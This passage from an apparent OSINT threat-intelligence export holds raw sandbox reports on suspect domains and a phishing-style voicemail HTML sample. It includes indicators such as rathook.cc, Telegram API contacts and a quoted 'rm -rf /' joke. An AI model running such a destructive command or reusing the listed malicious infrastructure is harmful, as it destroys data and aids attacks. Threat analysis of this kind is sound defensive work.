b,c,d,e,f;if(null!=(e=null!=(d=null==(b=X(a).head_tag_slot_vars)?void 0:b.google_ad_client)?d:null==(c=a.document.querySelector(".adsbygoogle[data-ad-client]"))?void 0:c.getAttribute("data-ad-client")))b=e;else{b:{b=a.document.getElementsByTagName("script");a=a.navigator&&a.navigator.userAgent||"";a=RegExp("appbankapppuzdradb|daumapps|fban|fbios|fbav|fb_iab|gsa/|messengerforios|naver|niftyappmobile|nonavigation|pinterest|twitter|ucbrowser|yjnewsapp|youtube"," (Indicator: "twitter")\n "function iF(a){var b=a.j.wpc;if(null!==b&&""!==b)var c=b;else{b=a.j;a=a.win;if(a.google_ad_client)var d=String(a.google_ad_client);else{var e,f,g;if(null!=(g=null!=(f=null==(d=ME(a).head_tag_slot_vars)?void 0:d.google_ad_client)?f:null==(e=a.document.querySelector(".adsbygoogle[data-ad-client]"))?void 0:e.getAttribute("data-ad-client")))d=g;else{c:{d=a.document.getElementsByTagName("script");e=a.navigator&&a.navigator.userAgent||"";e=RegExp("appbankapppuzdradb|daumapps|fban|fbios|fbav|fb_iab|gsa/|messengerforios|naver|niftyappmobile|nonavigation|pinterest|twitter|ucbrowser|yjnewsapp|youtube"," (Indicator: "twitter")'}, {u'category': u'General', u'origin': u'Binary File', u'identifier': u'binary-16', u'name': u'Drops files marked as clean', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'Antivirus vendors marked dropped file "urlblockindex_1_.bin" as clean (type is "data")\n Antivirus vendors marked dropped file "TarB03F.tmp" as clean (type is "data")\n Antivirus vendors marked dropped file "TarB01E.tmp" as clean (type is "data")'}, {u'category': u'Unusual Characteristics', u'origin': u'Binary File', u'identifier': u'binary-5', u'name': u'Drops cabinet archive files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1105', u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'"77EC63BDA74BD0D0E0426DC8F8008506" has type "Microsoft Cabinet archive data Windows 2000/XP setup 62582 bytes 1 file at 0x2c +A "authroot.stl" number 1 6 datablocks 0x1 compression"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\Content\\77EC63BDA74BD0D0E0426DC8F8008506]- [targetUID: 00000000-00003832]\n "CabB02E.tmp" has type "Microsoft Cabinet archive data Windows 2000/XP setup 62582 bytes 1 file at 0x2c +A "authroot.stl" number 1 6 datablocks 0x1 compression"- Location: [%TEMP%\\CabB02E.tmp]- [targetUID: 00000000-00003832]'}, {u'category': u'Installation/Persistence', u'origin': u'Binary File', u'identifier': u'binary-0', u'name': u'Dropped files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1105', u'relevance': 3, u'threat_level': 0, u'type': 8, u'description': u'"urlblockindex_1_.bin" has type "data"- [targetUID: N/A]\n "f_2_.txt" has type "ASCII text with very long lines"- [targetUID: N/A]\n "TarB03F.tmp" has type "data"- Location: [%TEMP%\\TarB03F.tmp]- [targetUID: 00000000-00003832]\n "rx_lidar_1_.js" has type "ASCII text with very long lines"- [targetUID: N/A]\n "ads_1_.htm" has type "HTML document UTF-8 Unicode text with very long lines with no line terminators"- [targetUID: N/A]\n "77EC63BDA74BD0D0E0426DC8F8008506" has type "Microsoft Cabinet archive data Windows 2000/XP setup 62582 bytes 1 file at 0x2c +A "authroot.stl" number 1 6 datablocks 0x1 compression"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\Content\\77EC63BDA74BD0D0E0426DC8F8008506]- [targetUID: 00000000-00003832]\n "analytics_2_.js" has type "ASCII text with very long lines"- [targetUID: N/A]\n "20bbf47129839b0fb73908ded7623d1d_1_.js" has type "ASCII text with very long lines"- [targetUID: N/A]\n "DzRfYBHlb_-YbcWIbUWhaiqMI2yuoh2HvVgg6okGiSg_1_.js" has type "ASCII text with very long lines"- [targetUID: N/A]\n "f_5_.txt" has type "ASCII text with very long lines"- [targetUID: N/A]\n "f_3_.txt" has type "ASCII text with very long lines"- [targetUID: N/A]\n "4Ua_rENHsxJlGDuGo1OIlJfC6l_24rlCK1Yo_Iqcsih3SAyH6cAwhX9RFD48TE63OOYKtrw2IJllpy8_1_.woff" has type "Web Open Font Format TrueType length 24196 version 1.1"- [targetUID: N/A]\n "4Ua_rENHsxJlGDuGo1OIlJfC6l_24rlCK1Yo_Iqcsih3SAyH6cAwhX9RFD48TE63OOYKtrwEIJllpy8_1_.woff" has type "Web Open Font Format TrueType length 23148 version 1.1"- [targetUID: N/A]\n "en-US.4" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Internet Explorer\\DomainSuggestions\\en-US.4]- [targetUID: 00000000-00002232]\n "RecoveryStore._88B090C0-D917-11E7-B67B-080027A49DD6_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "sodar2_1_.js" has type "ASCII text with very long lines"- [targetUID: N/A]\n "f_3_.txt" has type "JSON data"- [targetUID: N/A]\n "~DFA0DE7E20CA2F8F31.TMP" has type "data"- Location: [%TEMP%\\~DFA0DE7E20CA2F8F31.TMP]- [targetUID: 00000000-00002232]'}, {u'category': u'Installation/Persistence', u'origin': u'Binary File', u'identifier': u'binary-39', u'name': u'Drops XML files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1105', u'relevance': 1, u'threat_level': 0, u'type': 8, u'description': u'"angryip_1_.xml" has type "Unknown"\n "www.google_1_.xml" has type "Unknown"'}, {u'category': u'Network Related', u'origin': u'File/Memory', u'identifier': u'string-3', u'name': u'Found potential URL in binary/memory', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071', u'relevance': 10, u'threat_level': 0, u'type': 2, u'description': u'Pattern match: "https://angryip.org/download/#windows"\n Pattern match: "https://angryip.org"\n Pattern match: "https://pagead2.googlesyndication.com/pagead/gen_204?id=tcfe;yd(a,function(d,e){if(d||0===d)c+=&+e+=+encodeURIComponent(+d)});Od(c,b)}function"\n Pattern match: "https://pagead2.googlesyndication.com+b,d=ke(a)-b.length;if"\n Pattern match: "https://pagead2.googlesyndication.com/pagead/ping,If,void"\n Pattern match: "https://pagead2.googlesyndication.com/pagead/js/err_rep.js"\n Pattern match: "https://pagead2.googlesyndication.com/pagead/gen_204?id=plmetrics;window.LayoutShift&&"\n Pattern match: "https://www.google.com/adsense"\n Pattern match: "https://adsense.com"\n Pattern match: "https://pagead2.googlesyndication.com/pagead/managed/js/adsense/,/slotcar_library,.js"\n Pattern match: "https://ampcid.google.com/v1/publisher:getClientId"\n Pattern match: "www.google-analytics.com},Ge=function(a){switch(a){default:case"\n Pattern match: "https://stats.g.doubleclick.net/j/collect"\n Pattern match: "https://www.google.com/ads/ga-audiences,a.google,c"\n Pattern match: "https://tagassistant.google.com/"\n P | 185.199.111.153 |
| 2023-05-12 02:54:38 | Open TCP Port | No | Censys | 0 | 0 | 3 | 0 | None | 172.67.168.252:2052 | 172.67.168.252 |
| 2023-05-12 02:44:04 | Web Technology | No | Tool - WAFW00F | 0 | 0 | 1 | 0 | None | Fastly CDN Fastly | battleb0t.xyz |
| 2023-05-12 03:01:46 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.97.254): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.97.0/24 |
| 2023-05-12 02:54:03 | HTTP Headers | No | Censys | 0 | 0 | 2 | 0 | None | {"_encoding": {"Referrer_Policy": "DISPLAY_UTF8", "Expires": "DISPLAY_UTF8", "Vary": "DISPLAY_UTF8", "Server": "DISPLAY_UTF8", "Cf_Ray": "DISPLAY_UTF8", "Connection": "DISPLAY_UTF8", "Content_Type": "DISPLAY_UTF8", "Date": "DISPLAY_UTF8", "X_Frame_Options": "DISPLAY_UTF8", "Cache_Control": "DISPLAY_UTF8"}, "Referrer_Policy": ["same-origin"], "Expires": ["Thu, 01 Jan 1970 00:00:01 GMT"], "Vary": ["Accept-Encoding"], "Server": ["cloudflare"], "Cf_Ray": ["7c52e4b1988e1e3e-FRA"], "Connection": ["close"], "Content_Type": ["text/html; charset=UTF-8"], "Date": ["<REDACTED>"], "X_Frame_Options": ["SAMEORIGIN"], "Cache_Control": ["private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0"]} | 172.67.135.9 |
| 2023-05-12 02:54:10 | HTTP Headers | No | Censys | 0 | 0 | 2 | 0 | None | {"Content_Length": ["253"], "_encoding": {"Content_Length": "DISPLAY_UTF8", "Server": "DISPLAY_UTF8", "Date": "DISPLAY_UTF8", "Connection": "DISPLAY_UTF8", "Content_Type": "DISPLAY_UTF8", "Cf_Ray": "DISPLAY_UTF8"}, "Server": ["cloudflare"], "Date": ["<REDACTED>"], "Connection": ["close"], "Content_Type": ["text/html"], "Cf_Ray": ["-"]} | 2606:4700:3031::6815:6a6 |
| 2023-05-12 03:09:27 | SSL Certificate - Issued by | No | SSL Certificate Analyzer | 0 | 0 | 2 | 0 | None | C=US,O=Cloudflare\, Inc.,CN=Cloudflare Inc ECC CA-3 | 188.114.97.1 |
| 2023-05-12 02:54:18 | Linked URL - Internal | No | Web Spider | 0 | 0 | 3 | 0 | None | https://pics.battleb0t.xyz/images/master058_2.PNG | https://pics.battleb0t.xyz/ |
| 2023-05-12 03:18:53 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | <no ssid> (Net ID: 00:06:25:AC:5B:3E) | 39.0469, -77.4903 |
| 2023-05-12 02:46:50 | Co-Hosted Site | No | SSL Certificate Analyzer | 0 | 0 | 3 | 0 | None | netlify.app | 34.148.97.127 |
| 2023-05-12 03:18:49 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | PumaLANd Airport 1 (Net ID: 00:02:2D:39:EC:A6) | 34.0544, -118.244 |
| 2023-05-12 03:19:01 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | Enis_Home (Net ID: 00:02:CF:DB:CE:E7) | 40.2024, 29.0398 |
| 2023-05-12 03:18:51 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | suddenlink.net-9796 (Net ID: 5C:8F:E0:22:97:94) | 37.751, -97.822 |
| 2023-05-12 02:48:36 | Raw Data from RIRs | No | Hybrid Analysis | 0 | 0 | 2 | 0 | None | [{u'subsystem': None, u'classification_tags': [], u'crowdstrike_ai': {u'executable_process_memory_analysis': [], u'analysis_related_urls': []}, u'total_processes': 64, u'threat_score': 100, u'compromised_hosts': [], u'environment_id': 160, u'major_os_version': None, u'submit_name': u'https://rathook.cc/', u'signatures': [{u'category': u'General', u'origin': u'API Call', u'identifier': u'api-22', u'name': u'Fails to load modules at runtime', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1574/002', u'threat_level_human': u'informative', u'capec_id': u'CAPEC-641', u'attck_id': u'T1574.002', u'relevance': 1, u'threat_level': 0, u'type': 6, u'description': u'"msedge.exe" failed to load missing module "MDMRegistration.dll" - [base:0; Status:c000000d]\n "msedge.exe" failed to load missing module "netapi32.dll" - [base:0; Status:c000000d]'}, {u'category': u'General', u'origin': u'Created Mutant', u'identifier': u'mutant-0', u'name': u'Creates mutants', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 4, u'description': u'"\\Sessions\\1\\BaseNamedObjects\\SM0:4108:304:WilStaging_02"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\SM0:4108:304:WilStaging_02"\n "\\Sessions\\1\\BaseNamedObjects\\ChromeProcessSingletonStartup!"\n "Local\\SM0:3580:304:WilStaging_02"\n "SM0:3580:120:WilError_01"\n "Local\\SM0:3580:120:WilError_01"\n "InternetShortcutMutex"\n "SM0:4108:120:WilError_01"\n "SM0:4108:304:WilStaging_02"\n "Local\\SM0:4108:304:WilStaging_02"\n "ChromeProcessSingletonStartup!"\n "\\Sessions\\1\\BaseNamedObjects\\SM0:4108:120:WilError_01"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-1', u'name': u'Contacts server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"185.199.110.153:443"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-51', u'name': u'Queries DNS server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071/004', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071.004', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"rathook.cc"'}, {u'category': u'General', u'origin': u'File/Memory', u'identifier': u'string-10', u'name': u'Found a reference to a known community page', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 7, u'threat_level': 0, u'type': 2, u'description': u'"<meta name="twitter:card" content="summary_large_image">" (Indicator: "twitter")\n "<meta name="twitter:title" content="rathook.cc">" (Indicator: "twitter")\n "<meta name="twitter:description" content="So good that it rm -rf\'s your /">" (Indicator: "twitter")\n "<meta name="twitter:image" content="https://rathook.cc/rat.gif">" (Indicator: "twitter")'}, {u'category': u'Installation/Persistence', u'origin': u'API Call', u'identifier': u'api-203', u'name': u'Tries to access LNK files (Windows shortcut)', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1083', u'threat_level_human': u'informative', u'capec_id': u'CAPEC-497', u'attck_id': u'T1083', u'relevance': 3, u'threat_level': 0, u'type': 6, u'description': u'"msedge.exe" trying to access LNK file "C:\\Users\\%OSUSER%\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\Microsoft Edge.lnk"'}, {u'category': u'Installation/Persistence', u'origin': u'Binary File', u'identifier': u'binary-0', u'name': u'Dropped files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1105', u'relevance': 3, u'threat_level': 0, u'type': 8, u'description': u'"data_2" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\ShaderCache\\data_2]- [targetUID: 00000000-00004108]\n "data_1" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\DawnCache\\data_1]- [targetUID: 00000000-00004108]\n "f_0004c4" has type "Audio file with ID3 version 2.4.0 contains:MPEG ADTS layer III v1 64 kbps 44.1 kHz Stereo"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\Cache\\Cache_Data\\f_0004c4]- [targetUID: 00000000-00003380]\n "000003.log" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\Site Characteristics Database\\000003.log]- [targetUID: 00000000-00004108]\n "History" has type "SQLite 3.x database last written using SQLite version 3039003"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\History]- [targetUID: 00000000-00003580]\n "Web Data" has type "SQLite 3.x database last written using SQLite version 3039003"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\Web Data]- [targetUID: 00000000-00004108]\n "Visited Links" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\Visited Links]- [targetUID: 00000000-00004108]\n "data_0" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\DawnCache\\data_0]- [targetUID: 00000000-00004108]\n "Tabs_13325492462112767" has type "data"- [targetUID: N/A]\n "ba9eeff3-0e9b-418b-bd12-291953464a4e.tmp" has type "UTF-8 Unicode text with very long lines with no line terminators"- [targetUID: N/A]\n "a3bc7a46-aa43-4dec-aba5-04629b4b4587.tmp" has type "UTF-8 Unicode text with very long lines with no line terminators"- [targetUID: N/A]\n "77EC63BDA74BD0D0E0426DC8F8008506" has type "Microsoft Cabinet archive data Windows 2000/XP setup 62582 bytes 1 file at 0x2c +A "authroot.stl" number 1 6 datablocks 0x1 compression"- [targetUID: N/A]\n "Cookies" has type "SQLite 3.x database last written using SQLite version 3039003"- [targetUID: N/A]\n "History-journal" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\History-journal]- [targetUID: 00000000-00004108]\n "Favicons" has type "SQLite 3.x database last written using SQLite version 3039003"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\Favicons]- [targetUID: 00000000-00004108]\n "Cookies-journal" has type "SQLite Rollback Journal"- [targetUID: N/A]\n "Vpn Tokens" has type "SQLite 3.x database last written using SQLite version 3039003"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\Vpn Tokens]- [targetUID: 00000000-00004108]\n "f_0004c3" has type "gzip compressed data from Unix original size modulo 2^32 106255"- [targetUID: N/A]\n "73cdbe4b-9686-4d04-b7be-c9c3f4f3e672.tmp" has type "ASCII text with very long lines with no line terminators"- [targetUID: N/A]'}, {u'category': u'Network Related', u'origin': u'File/Memory', u'identifier': u'string-3', u'name': u'Found potential URL in binary/memory', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071', u'relevance': 10, u'threat_level': 0, u'type': 2, u'description': u'Pattern match: "https://rathook.cc/"\n Pattern match: "https://rathook.cc"\n Heuristic match: "rathook.cc"\n Pattern match: "https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE53r3l?ver=5412,PORTRAIT:https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE53bta?ver=2bf3,update_period:86400},creativeId:128000000003595"\n Pattern match: "www.playstation.com},{applied_policy:block,domain:bing.com},{applied_policy:block,domain:browserbench.org},{applied_policy:block,domain:www.principledtechnologies.com},{applied_policy:block,domain:web.basemark.com},{applie"\n Pattern match: "assets.db/MANIFEST-0000012023/04/08-22:41:11.570"\n Pattern match: "assets.db/MANIFEST-000001"\n Pattern match: "assets.db/000003.log"\n Pattern match: "https://rathook.cc/rat.gif"\n Heuristic match: "athook.cc"\n Pattern match: "http://schemas.microsoft.com/SMI/2005/WindowsSettings"'}, {u'category': u'Network Related', u'origin': u'File/Memory', u'identifier': u'string-14', u'name': u'Found potential IP address in binary/memory', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071', u'relevance': 3, u'threat_level': 0, u'type': 2, u'description': u'Potential IP "5.1.0.0" found in string "Microsoft.Windows.Shell.rundll32,processorArchitecture="amd64",type="win32",version="5.1.0.0"C:\\WINDOWS\\system32\\RunDll32.exe"\n Potential IP "5.1.0.0" found in string "Microsoft.Windows.InetCore.ieframe,processorArchitecture="amd64",type="win32",version="5.1.0.0"C:\\Windows\\System32\\ieframe.dll"\n Potential IP "5.1.0.0" found in string "Microsoft.Windows.Shell.shell32,processorArchitecture="*",type="win32",version="5.1.0.0"C:\\WINDOWS\\WindowsShell.Manifest"\n "192.168.241.220"\n Potential IP "5.1.0.0" found in string "Microsoft.Windows.Shell.shell32,processorArchitecture="amd64",type="win32",version="5.1.0.0"C:\\WINDOWS\\System32\\SHELL32.dll"\n Potential IP "5.1.0.0" found in string "version="5.1.0.0""'}, {u'category': u'Unusual Characteristics', u'origin': u'Binary File', u'identifier': u'binary-5', u'name': u'Drops cabinet archive files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'suspicious', u'capec_id': None, u'attck_id': u'T1105', u'relevance': 10, u'threat_level': 1, u'type': 8, u'description': u'"77EC63BDA74BD0D0E0426DC8F8008506" has type "Microsoft Cabinet archive data Windows 2000/XP setup 62582 bytes 1 file at 0x2c +A "authroot.stl" number 1 6 datablocks 0x1 compression"- [targetUID: N/A]'}, {u'category': u'External Systems', u'origin': u'External System', u'identifier': u'avtest-0', u'name': u'Sample was identified as malicious by at least one Antivirus engine', u'attck_id_wiki': None, u'threat_level_human': u'suspicious', u'capec_id': None, u'attck_id': None, u'relevance': 0, u'threat_level': 1, u'type': 12, u'description': u'1/91 Antivirus vendors marked sample as malicious (1% detection rate)'}], u'threat_level': 1, u'size': None, u'job_id': u'64324ea527cf82106202bff7', u'target_url': None, u'in | 185.199.110.153 |
| 2023-05-12 02:50:13 | Raw Data from RIRs | No | Hybrid Analysis | 1 | 0 | 2 | 0 | None | [{u'subsystem': None, u'classification_tags': [], u'crowdstrike_ai': {u'executable_process_memory_analysis': [], u'analysis_related_urls': []}, u'total_processes': 15, u'threat_score': 100, u'compromised_hosts': [], u'environment_id': 160, u'major_os_version': None, u'submit_name': u'Voicemail Message (Elodie Raven_ Fernando R ) From_(178-077-5401)_part_001.html', u'signatures': [{u'category': u'General', u'origin': u'Binary File', u'identifier': u'binary-16', u'name': u'Drops files marked as clean', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'Antivirus vendors marked dropped file "widevinecdm.dll" as clean (type is "PE32+ executable (DLL) (console) x86-64 for MS Windows")'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-1', u'name': u'Contacts server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"104.22.58.100:443"\n "185.199.110.153:443"\n "13.227.74.112:443"\n "149.154.167.220:443"'}, {u'category': u'General', u'origin': u'Created Mutant', u'identifier': u'mutant-0', u'name': u'Creates mutants', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 4, u'description': u'"\\Sessions\\1\\BaseNamedObjects\\Local\\SM0:5828:304:WilStaging_02"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\ChromeProcessSingletonStartup!"\n "Local\\SM0:5828:304:WilStaging_02"\n "Local\\SM0:5828:120:WilError_01"\n "Local\\ChromeProcessSingletonStartup!"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\SM0:5828:120:WilError_01"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\SM0:8140:304:WilStaging_02"\n "Local\\SM0:8140:304:WilStaging_02"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\SM0:6188:304:WilStaging_02"\n "Local\\SM0:6188:304:WilStaging_02"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-51', u'name': u'Queries DNS server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071/004', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071.004', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"api.telegram.org"\n "getbootstrap.com"\n "zeptojs.com"'}, {u'category': u'Unusual Characteristics', u'origin': u'Binary File', u'identifier': u'binary-35', u'name': u'Drops script files inside temp directory', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 5, u'threat_level': 0, u'type': 8, u'description': u'Dropped file: "shopping_iframe_driver.js" - Location: [%TEMP%\\5828_1708721866\\shopping_iframe_driver.js]- [targetUID: 00000000-00005828]\n Dropped file: "product_page.js" - Location: [%TEMP%\\5828_1708721866\\product_page.js]- [targetUID: 00000000-00005828]\n Dropped file: "adblock_snippet.js" - Location: [%TEMP%\\5828_946205218\\adblock_snippet.js]- [targetUID: 00000000-00005828]\n Dropped file: "auto_open_controller.js" - Location: [%TEMP%\\5828_1708721866\\auto_open_controller.js]- [targetUID: 00000000-00005828]\n Dropped file: "edge_checkout_page_validator.js" - Location: [%TEMP%\\5828_1708721866\\edge_checkout_page_validator.js]- [targetUID: 00000000-00005828]\n Dropped file: "shoppingfre.js" - Location: [%TEMP%\\5828_1708721866\\shoppingfre.js]- [targetUID: 00000000-00005828]\n Dropped file: "edge_tracking_page_validator.js" - Location: [%TEMP%\\5828_1708721866\\edge_tracking_page_validator.js]- [targetUID: 00000000-00005828]\n Dropped file: "edge_confirmation_page_validator.js" - Location: [%TEMP%\\5828_1708721866\\edge_confirmation_page_validator.js]- [targetUID: 00000000-00005828]'}, {u'category': u'Unusual Characteristics', u'origin': u'Binary File', u'identifier': u'binary-33', u'name': u'Drops executable files inside temp directory', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 8, u'description': u'"widevinecdm.dll" has type "PE32+ executable (DLL) (console) x86-64 for MS Windows"- Location: [%TEMP%\\5828_1392880218\\_platform_specific\\win_x64\\widevinecdm.dll]- [targetUID: 00000000-00005828]'}, {u'category': u'Installation/Persistence', u'origin': u'Binary File', u'identifier': u'binary-0', u'name': u'Dropped files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1105', u'relevance': 3, u'threat_level': 0, u'type': 8, u'description': u'"widevinecdm.dll" has type "PE32+ executable (DLL) (console) x86-64 for MS Windows"- Location: [%TEMP%\\5828_1392880218\\_platform_specific\\win_x64\\widevinecdm.dll]- [targetUID: 00000000-00005828]\n "000003.log" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\Sync Data\\LevelDB\\000003.log]- [targetUID: 00000000-00005828]\n "Part-DE" has type "data"- Location: [%TEMP%\\5828_946205218\\Part-DE]- [targetUID: 00000000-00005828]\n "6373a9a3-7787-4e10-8766-4a701eb0bde9.tmp" has type "ASCII text with very long lines with no line terminators"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\Network\\6373a9a3-7787-4e10-8766-4a701eb0bde9.tmp]- [targetUID: 00000000-00006188]\n "load_statistics.db-wal" has type "SQLite Write-Ahead Log version 3007000"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\load_statistics.db-wal]- [targetUID: 00000000-00005828]\n "LICENSE" has type "ASCII text with CRLF line terminators"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Subresource Filter\\Unindexed Rules\\10.34.0.41\\LICENSE]- [targetUID: 00000000-00005828]\n "75eccbf3-b65d-4d67-bf83-de033f7007cc.tmp" has type "very short file (no magic)"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\75eccbf3-b65d-4d67-bf83-de033f7007cc.tmp]- [targetUID: 00000000-00005828]\n "shopping.js" has type "UTF-8 Unicode text with very long lines with CRLF line terminators"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Edge Shopping\\2.0.2353.0\\shopping.js]- [targetUID: 00000000-00005828]\n "7de06ccc-e1f1-446e-9777-eeec16b06646.tmp" has type "ASCII text with no line terminators"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\7de06ccc-e1f1-446e-9777-eeec16b06646.tmp]- [targetUID: 00000000-00005828]\n "e3268b96-87e6-41f7-9441-5c4416dab6c3.tmp" has type "UTF-8 Unicode text with very long lines with no line terminators"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\e3268b96-87e6-41f7-9441-5c4416dab6c3.tmp]- [targetUID: 00000000-00005828]\n "d2a4e9f5-a74b-406f-8c0f-67bbb0725fef.tmp" has type "UTF-8 Unicode text with very long lines with no line terminators"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\d2a4e9f5-a74b-406f-8c0f-67bbb0725fef.tmp]- [targetUID: 00000000-00005828]\n "settings.dat" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Crashpad\\settings.dat]- [targetUID: 00000000-00005828]\n "Ruleset Data" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Subresource Filter\\Indexed Rules\\35\\10.34.0.24\\Ruleset Data]- [targetUID: 00000000-00005828]\n "39d75e53-4923-4b9e-bc44-d169ef496172.tmp" has type "UTF-8 Unicode text with very long lines with no line terminators"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\39d75e53-4923-4b9e-bc44-d169ef496172.tmp]- [targetUID: 00000000-00005828]\n "72e56d01-e7ac-415a-b604-164a33d2eb3d.tmp" has type "UTF-8 Unicode text with very long lines with no line terminators"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\72e56d01-e7ac-415a-b604-164a33d2eb3d.tmp]- [targetUID: 00000000-00005828]\n "manifest.fingerprint" has type "ASCII text with no line terminators"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Subresource Filter\\Unindexed Rules\\10.34.0.24\\manifest.fingerprint]- [targetUID: 00000000-00005828]\n "8590c4d3-1805-4c87-83be-f642e5ed3447.tmp" has type "UTF-8 Unicode text with very long lines with no line terminators"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\8590c4d3-1805-4c87-83be-f642e5ed3447.tmp]- [targetUID: 00000000-00005828]\n "verified_contents.json" has type "JSON data"- Location: [%TEMP%\\5828_1392880218\\_metadata\\verified_contents.json]- [targetUID: 00000000-00005828]\n "shopping_iframe_driver.js" has type "ASCII text with very long lines with CRLF line terminators"- Location: [%TEMP%\\5828_1708721866\\shopping_iframe_driver.js]- [targetUID: 00000000-00005828]\n "LOG" has type "ASCII text"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User 